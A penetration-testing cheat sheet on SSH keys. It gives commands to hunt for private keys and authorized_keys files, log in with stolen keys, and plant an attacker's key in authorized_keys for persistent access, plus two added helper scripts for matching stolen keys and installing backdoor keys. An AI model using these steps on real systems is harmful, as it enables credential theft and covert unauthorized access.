SSH Keys
id_rsa, id_rsa.pub, authorized_keys
What is an SSH Keypair?
When we generate an SSH key with ssh-keygen, we are generating a public/private key pair. Older OpenSSH releases default to RSA, which is where the id_rsa file names come from; OpenSSH 9.5 and later default to Ed25519 and name the files id_ed25519 and id_ed25519.pub.
Public key:
id_rsa.pub
Private key:
id_rsa
Password-less SSH requires that your public key (id_rsa.pub) is listed in ~/.ssh/authorized_keys of the account you log in as on the server; the server then checks that you hold the matching private key instead of asking for the account's password.
Enumeration
Search for SSH private keys (widen the name pattern to id_ed25519, id_ecdsa and so on; a private key of any name starts with a -----BEGIN ... PRIVATE KEY----- line):
find / -name id_rsa 2>/dev/null
Search for authorized_keys files (the public keys allowed to log in without a password, one per line):
find / -name authorized_keys 2>/dev/null
SSH without Password
Once we have a private key from the victim machine, we can try to SSH in with it instead of a password. The matching public key must be recorded in authorized_keys of the account we log in as, and any options on that line (from=, command=, no-pty, ...) still apply to our session; if the key is passphrase-protected, ssh will prompt for the passphrase.
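Before spending time on a found key, it is worth knowing which accounts actually accept it and under what restrictions. The script below is an added example and not code from the original page: given the public half of a found key (id_rsa.pub next to id_rsa; if only the private key exists, ssh-keygen -y -f id_rsa regenerates the .pub) and any authorized_keys files the enumeration turned up, it reports every line that accepts the key and the option prefix on that line. All key blobs are constructed placeholders and all paths are assumptions.

```shell
#!/bin/sh
# Added example for this page, not the original author's code: given a public
# key found next to a private key on the victim, report which authorized_keys
# lines accept it and which options (from=, command=, no-pty, ...) restrict
# that login. sshd accepts a key when "type blob" matches a line, so that is
# the comparison made here. All key blobs below are constructed placeholders,
# not real key material, and every path is an assumption.

# pubkey_fields FILE: print "type blob" of the key in a .pub file.
pubkey_fields() {
    ktype='' kblob='' kcomment=''
    read -r ktype kblob kcomment < "$1" || [ -n "$ktype" ] || return 1
    [ -n "$kblob" ] || return 1
    printf '%s %s\n' "$ktype" "$kblob"
}

# match_authorized_key PUBFILE AUTHFILE...
# For every authorized_keys line that accepts PUBFILE, print
# "<authfile>: options=[<option prefix>]"; an empty prefix means an
# unrestricted login. Blank and comment lines are skipped, and a blob that is
# only a prefix of another never matches. Returns 0 if any line matched.
match_authorized_key() {
    pub=$(pubkey_fields "$1") || return 1
    shift
    found=1
    for authfile in "$@"; do
        [ -r "$authfile" ] || continue
        while IFS= read -r line || [ -n "$line" ]; do
            case "$line" in
                ''|'#'*)             continue ;;
                "$pub"|"$pub "*)     opts='' ;;
                *" $pub"|*" $pub "*) opts=${line%%" $pub"*} ;;
                *)                   continue ;;
            esac
            found=0
            printf '%s: options=[%s]\n' "$authfile" "$opts"
        done < "$authfile"
    done
    return $found
}

# make_samples DIR: write the found key's public half and two constructed
# authorized_keys files into DIR (sample data for the demo, not real keys).
make_samples() {
    blob='AAAAB3NzaC1yc2EAAAADAQABAAABAQCsample0not0a0real0key0blob0000000000000000'
    printf 'ssh-rsa %s backup@victim\n' "$blob" > "$1/id_rsa.pub"
    # Same type, blob shortened by two characters: a prefix must not match.
    printf 'ssh-rsa %s other@victim\n' "${blob%??}" > "$1/other.pub"
    cat > "$1/authorized_keys_alice" <<EOF
# alice's keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCanother0constructed0blob000000000000000000 alice@laptop
ssh-rsa $blob backup@victim
EOF
    cat > "$1/authorized_keys_backup" <<EOF
from="10.0.0.0/8",command="/usr/local/bin/backup.sh",no-pty ssh-rsa $blob backup@victim
EOF
}

# Demo on the constructed samples; on a real target pass the found .pub and
# every authorized_keys file the enumeration step turned up.
tmp=$(mktemp -d)
make_samples "$tmp"
match_authorized_key "$tmp/id_rsa.pub" "$tmp/authorized_keys_alice" "$tmp/authorized_keys_backup"
rm -rf "$tmp"
```

The demo prints one unrestricted match in alice's file and one match in the backup account's file that is pinned to a source network and a forced command with no PTY: logging in there with the found key would run backup.sh rather than give a shell, which is exactly the kind of surprise this check is meant to reveal before the ssh -i attempt.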
Give the private key appropriate permissions (ssh refuses to use a key file that is readable by other users):
chmod 600 id_rsa
SSH in:
ssh -i id_rsa <username>@<remote_ip>
~/.ssh/authorized_keys
If ~/.ssh/authorized_keys is writable on the victim machine (or does not exist yet and ~/.ssh is writable), we can generate an SSH keypair and append the generated public key to this file. This lets us SSH into the victim machine as that user with the generated private key, and the access persists for as long as the entry stays in place. Note that with StrictModes (sshd's default), the file is ignored if it, ~/.ssh or the home directory is writable by group or others, or is not owned by the user.
Generate an SSH keypair on the attack machine:
ssh-keygen -f mykey
Add the contents of mykey.pub (a single line) to ~/.ssh/authorized_keys on the victim machine:
echo "<mykey.pub>" >> ~/.ssh/authorized_keys
Give the private key appropriate permissions:
chmod 600 mykey
SSH in:
ssh -i mykey <username>@<remote_ip>
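The one-line echo works when ~/.ssh already exists with sane permissions and the file ends in a newline; on a real target it often does not. The function below is an added example, not code from the original page, that performs the same "add my key" step in a way sshd's StrictModes will accept and that is safe to run more than once. The home directory path and the key line in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example for this page, not the original author's code: append our
# public key to a target account's authorized_keys in the shape sshd expects.
# It creates ~/.ssh if missing, sets the modes StrictModes will accept (700 on
# the directory, 600 on the file), keeps existing entries intact and does not
# add the same key twice. Ownership is left alone: StrictModes also wants the
# home directory, ~/.ssh and the file owned by the user (or root), so a key
# dropped into a writable file owned by someone else is still ignored.
# Paths and key material in the usage comment are assumptions.

# install_authorized_key HOMEDIR PUBKEY_LINE
# PUBKEY_LINE is the one-line content of mykey.pub ("type blob [comment]").
# Returns 0 when the key is present afterwards, 1 on bad input or I/O error.
install_authorized_key() {
    homedir=$1
    pubkey=$2
    case "$pubkey" in
        "ssh-"*" "*|"ecdsa-sha2-"*" "*|"sk-"*" "*) ;;
        *) echo "install_authorized_key: not a public key line: $pubkey" >&2; return 1 ;;
    esac
    sshdir="$homedir/.ssh"
    keyfile="$sshdir/authorized_keys"
    mkdir -p "$sshdir" && chmod 700 "$sshdir" || return 1
    [ -e "$keyfile" ] || : > "$keyfile" || return 1
    chmod 600 "$keyfile" || return 1
    # Whole-line match so a key that is already there is not appended again.
    grep -qxF -- "$pubkey" "$keyfile" && return 0
    # If the file's last line lacks a newline, appending blindly would glue our
    # key onto it and break both entries, so terminate that line first.
    if [ -s "$keyfile" ] && [ -n "$(tail -c 1 "$keyfile")" ]; then
        echo >> "$keyfile"
    fi
    printf '%s\n' "$pubkey" >> "$keyfile"
}

# Usage on the target (assumed paths):
#   install_authorized_key /home/victim "$(cat mykey.pub)"
```

If sshd still rejects the key after this, compare the ownership of the home directory, ~/.ssh and authorized_keys with the target account (ls -ld) and look for AuthorizedKeysFile in sshd_config, which can point the server at a different file entirely.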